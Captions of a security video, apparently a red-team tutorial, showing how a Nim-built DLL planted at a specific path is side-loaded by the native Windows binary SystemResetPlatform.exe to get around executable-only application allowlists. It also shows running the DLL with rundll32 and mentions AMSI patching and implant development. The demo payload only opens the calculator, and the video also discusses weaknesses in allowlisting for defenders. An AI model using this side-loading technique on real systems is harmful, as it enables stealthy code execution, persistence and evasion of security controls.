How Hackers Evade Program Allowlists with DLLs

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
the thing about defense is that administrators and key decision makers oftentimes want to go for the easiest most TurnKey solution the path of least resistance and this is a boon for the offense because as a hacker ethical hacker penetration tester red teamer all they have to do is not try to take advantage or dismantle a whole complete secure concept or idea they just need to break the implementation that means that misconfigurations or accidental forgotten or just unknown things gaps and holes in the security posture can open the door for this threat actor or offensive individual to do some more damage and of course that adversary will try to masquerade or blend in or remain stealthy and hidden in the work that they do and one of those common techniques that we talk about in cyber security is called living off the land where you can use a lot of the programs utilities and tools that are inherent and native to the operating system or the technology present so that they can do what they'd like to do so in this video we're like to Showcase one other living off the land technique that comes with it a little bit of an interesting conversation or some other Food For Thought or things that we should at least be cognizant of and maybe look back into for our own security settings now of course hey this is brought to light by grigoras torik forgive me OG tweet I know I always get your name wrong my friend uh but I'm just grateful and thankful for you allowing me and letting me I asked for permission he said of course it's all online and free for exactly this purpose to share and showcase what he has put together here this is another deal LL side loading technique it can work as a simple and maybe not so common way of bypassing application allow lists right things where you say hey I want only these programs to run however if that is configured and may be misconfigured to only allow executable files like a DOT exe file and not dlls these Dynamic link libraries that can still execute code this could slide right under the radar and of course he includes the screenshot uh in the background you can see I think procmon or process monitor from the system tool Suite taking a look at some of the features and functionality of the system reset platform.exe now this is a native binary it is installed it's already on your Windows operating system I'm rocking my Windows 10 machine as my host and that file is present and it's going to do some weird and interesting stuff because it looks like it will just naturally load an image or a dll from this path and this location on the file system C colon backslash dollar signs this reset for framework stack rjvplatform.dll now I don't think naturally that this file exists and if we just put one there it'll run it it'll do it if we can craft and create our own dll we as a threat actor putting our hacker hat on play pretend adversary we can do whatever we want now you as the listening in penetration tester or red teamer can of course use this for persistence hey maybe having some other back door that could escalate privileges or do something else or stage and fake some part of your aspect of a script for some other initial access or exploit or privilege escalation that you might do by trying to have some indirection and thinking this is a normal natural regular binary installed living on the land living off of the land to do something else but enough banter anyway I'm sorry for all that rambling let's get to it let's do some Show and Tell let's do some live demos and let's light off some fireworks here so what I'm going to do is make a directory called Nim because in this video I would like to test the waters and kind of get a feel for you who in your opinion and your input and your feedback on hey some more maybe I don't know uh implant malware Beacon development some offensive security that we might be able to do in Nim or Nim Lang now I know maybe I'll get some Flack for this because look we got to be late we gotta be super hacker need cyber Ninja Warrior cutting it up in C and C plus plus and low level languages like rust but man I'm scared of those things I'm not good at it so I thought you know hey maybe we can uh maybe bring the barrier to entry down a little bit and we could play with Nim because it looks like python it just feels like python but you can still do some really cool Elite cyber Ninja Warrior stuff with it anyway let me know if you would like to see more Nim uh videos and content on a lot of that mother offensive security stuff now the reason I'm gonna be writing some code in Nim we can create a mydll.nim with Sublime Text our Sublime Text text editor whatever editor you might like is because we need to create a dll we need to cause some code to run that is not just a flat regular exe it has to match this pattern and schema as we saw within CIS internals process monitor right the thing is with Nim this is super duper easy we are again standing on the shoulders of other incredible researchers and great folks that have done some phenomenal work regora's torik and Marcelo or bite bleeder who has put together an incredible GitHub repository called offensive Nim now you've probably seen a ton of these there are there is an offensive rust there is an offensive C sharp or whatever there's offensive golang there's plenty of these cool things that uh showcase some syntax Snippets and code in weaponizing a language for other offensive security work like implant development or malware development and this is phenomenal because it was so much cool cool stuff uh there is a little table of contents here a little bit of an index or other examples that you might be able to go take a look at like using win32 API calls like hey digging into some of the natural native NT API using the common language runtime building up name pipes doing uh stuff with amsi or AMZ patch not DTW so so much cool stuff that you should absolutely look at if you haven't already but we are going to start small we're going to crawl not run here before we run anyway we're going to create some windows dlls with a dll main function actually before we start cutting up the code let's hear a quick word from today's sponsor Plex track when you're performing a penetration test you're in the zone you're hacking away and you're having fun Gathering findings beating up vulnerabilities and earning domain admin but you might be dreading the work that comes after you have to write a report but writing a pen test report doesn't have to be dull and boring and long and tedious in fact it can be a breeze you don't even have to worry about your report because Plex track can handle it for you if you aren't familiar Plex track is the Premier cyber security reporting and collaboration platform that makes penetration testers red teamers and cyber security teams more efficient effective and proactive Plex track removes the pain of reporting and lets you collaborate between both red and blue teams for Effective purple teaming and fast through remediation the Plex track platform lets you easily aggregate findings Poland reusable content from write-up databases and content libraries and track and measure engagement progress in real time import assets from CSV files or nmap or nessus and so many others of your favorite tools with over 25 Integrations you can streamline your reporting and collaboration process right into your existing workflow you can do even faster testing with Plex tract runbooks and show the impact to managers in leadership with Plex tracks analytics and visualizations within minutes you can have your pen test report done and dusted all with your team's logo and details and then sent off to the client spend more time hacking and less time reporting learn how you can boost your team's efficiency by 30 percent and cut reporting Time by up to 65 with Plex track seriously check out Plex track I have great colleagues and peers that use Plex track every day for reporting get started with my link below in the video description and let you and your team get back to hacking huge thanks to Plex track for sponsoring this video we're going to create some windows dlls with a dll main function because DL s the dynamic linked libraries will naturally invoke and run an exported function which is normally naturally dll main on Windows and Windows operating systems now Nim does something a little bit odd but that's okay it's again super easy to kind of work through and again thanks to all the great people that have already done this work for us the Nim compiler tries to create its own dll main function automatically but it doesn't actually export it it's not something you could actually try to call or use through and from that dll the dynamic link Library you have to create and Export a dll main Yourself by passing tact no main to the Nim compiler and then defining that dll main with the appropriate pragmas standard call Export C din lip now you need to create your own Nim main that will initialize Nim's garbage collector and that is apparently extremely important because otherwise your computer will just literally explode which I have not validated but I will press the I believe button and Trust now they're going to end up using the winim library which is some super cool library and package and module of nim code that will just naturally work with all the Wind 32 and like Windows operating systems types and functions and other methods and names and variables and things that would just be super duper helpful and handy for us to have it's like the windows.h file header and CNC plus plus for you low-level nerds and this is exactly how we can just build one out I'm gonna go ahead and copy this code it's creating a procedure or a function for nimane giving the dot C decal and import C pragmas and then building out our own dll main taking in the appropriate usual Syntax for arguments to go to a dll main function like the handle instance like the reason that this dll has been called and other Reserve keywords Etc now if the reason it's called is because a process has attached to it or that dll is just getting started and spoken into existence they do a simple message box like a win32 API call now we can do that super duper easily because of win Nim and they're using a lean rendition of it super small super duper easy again we can just copy and paste that code and I will go bring it into my my text editor in Sublime Text where I can save this with Ctrl s now this is easy this is this is literally all that we need if we want to get a little bit clever I don't know maybe not a message box we could do something a little bit more flashy hey Flex some super tiny Nim muscles for the moment let's import OS proc so we can start new processes within our operating system and then we could comment out our message box little hashtag octothorpe of course Very python-like and Nim syntax this is a crash course I'm sorry maybe we could get like a full-blown tutorial series on Nim maybe that'd be fun but anyway we could use OS proc this new imported library or module here and let's try to use an exec process and we can pass in like a calc.exe as a calculator just benign simple payload we could get into I don't know maybe trying to carve up some uh implants and beacons and interpreter callbacks the thing is Nim is uh very notoriously known for a lot of malware development now so it's pretty easily signatured um but that's okay it's malware I intend for it to be detected if we do any malicious stuff this actually returns however a value that must be worked with if we aren't going to end up working with the veil the return value then we should get rid of it so we should kind of discard that and that should fingers crossed be enough for us that's all we need to do super duper easy again copying and pasting and slapping in some of the other pragmas that are necessary there I think with that we can go go back to our command line and let's try to compile this thing we would normally use Nim if we had it installed with C to compile for mydll.nim the thing is when we do this we're going to get spat out a mydll.exe it is an executable file which is not what we want right now we want a dll so there is some other special syntax that we might be able to use to compile and of course this repository already gives us the sweet sauce the secret specify the syntax semantic sugar that we need here Nim compile tacd with the Mig W application or excuse me compiler app lib to Define it as a library no main so we don't have dll main automatically created for us by main CPU architecture and then mynim.dll which I believe should actually be the source code file that we want to use here so again we can just copy that syntax bring it back to my command line I'll paste this in and I'll change this to a mydll.nim as the file extension here not our compiled binary let this thing go Nim will compile it nice and easy and now we have a dll which is perfect because obviously trying to run my dll.exe would not work it would not do anything because it's it's written the code is put together to act as a dll let's go ahead and remove my dll.exe because it's not a dll but let's run our mydll.dll I guess we're just going to fire up PE Explorer which I guess is a I don't know function that I have set up on my machine to naturally open dlls the thing is it didn't pop up in the calculator it didn't run the code that we wanted because we didn't call our dll main as an exported function out of our Dynamic link Library does that make any sense what we can do is use run dll run dll 32 which does some odd stuff for me when I'm in uh Powershell so I'm going to actually drop down into CMD or cmdwxe old school command prompt and then I can probably pretty safely run 32dll.exe my dll.dll now we will need to give it the name of the function that we might want to run like the export and that syntax is with a comma so let's use dll main following that and fingers crossed we get our calculator we did it we built our stupid simple proof of concept payload now let's go take a look at what we could use with gregora's Torx little living off the land binary here this is cool this is where I want your imagination to run wild because we can do whatever we want in this code but right now we're doing the small stuff but we can stage it to not just run oh calc.exe or my malware.dll we can hide it and mask it within the system reset platform right so the syntax that they used was they make a directory with MD one of the aliases for that and that was in C colon backslash dollar signs this reset framework stack framework stack there we go and then we'll want to copy our dll my dll which should be copy in the syntax to that location under that what is it rjv platform.dll yeah rjv platform dot dll copied there we go and now we'll call from system 32 the natural install path for Windows system reset platform system reset platform.exe now we can trust and press the I believe button we don't need to fire up proc mod unless you really wanted to see this thing in action it will end up loading and kicking off our dll system reset platform dot exe hit enter and there's our calculator of course simple benign payload but I want you as our red team or hacker ethical I don't know programmer whatever development malware engineer that could be an opportunity for you to craft something else a little bit stealthy and remember here the benefit is that this is a dynamic linked Library there's a dll it is not a DOT exe you're doing some interaction with dll side loading which again has that interesting conversation of okay if you're up against application allow listing or deny listing where you're not allowed to run things that aren't native or inherent exes like local binary files well maybe they've forgot something or there's a little bit of a gap where those dlls are allowed to run and this is exactly the conversation that was had on Twitter uh an individual said look I did some basic testing with like app Locker or wdac Windows Defender application control uh on trying to block dlls but to be honest it's tough like it's really annoying like you need a lot of this functionality for of course Windows applications and programs and there are like unsigned dlls just floating around out there even if they go with signed applications and binaries and software Gregory says exactly it's exactly why Dilo allow listing is often called phase two and it's never actually implemented now of course hey uh take that with a grain of salt maybe your organization is doing it right you got security locked down and you've completed all of that great allow listing and your zero trust topology Etc thumbs up they chat about this a little bit more you know I think the only way to do it is like big data that Microsoft might have with a lot of The Trusted installers in wdac even then it's not easy there's a whole lot of administrative burden it digs into user experience and you've got again that balancing scale of convenience versus security privacy versus uh just being able to get your job done right really interesting stuff here if you would be willing to uh dig into it I can include that link in the description and I hope this is kind of a neat cool trick for you again Kudos shout out credit where Carl is due uh OG tweet is always putting out incredible stuff thank you so much for watching everybody I hope you enjoyed this video hope it was a little bit of a cutesy fun little showcase maybe digging into a little bit of nim or at least uh testing the water dipping our toes in the pool to see do you guys want to see more Nim like man should that be like its own thing maybe some more malware development implant stuff that I would love to get into for offensive security research um let me know let me know give me that feedback in the comments and please please please do all those YouTube algorithm things like comment subscribe if you like this video and are willing to support the channel of great stuff we do there's patreon PayPal links in the description and please pretty please check out our sponsor they're doing some incredible stuff in the penetration testing and red teaming and purple teaming space just as well we're all in this thing together we're standing on the shoulders of giants and you know what it takes everyone playing in concert uh working as a team to make security better thanks everyone see in the next video
Info
Channel: John Hammond
Views: 45,528
Rating: undefined out of 5
Keywords: cybersecurity, learn, programming, coding, capture the flag, ctf, malware, analysis, dark web, how to learn cybersecurity, beginners
Id: 9fV8tWb2W1M
Channel Id: undefined
Length: 17min 27sec (1047 seconds)
Published: Thu Jun 15 2023
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.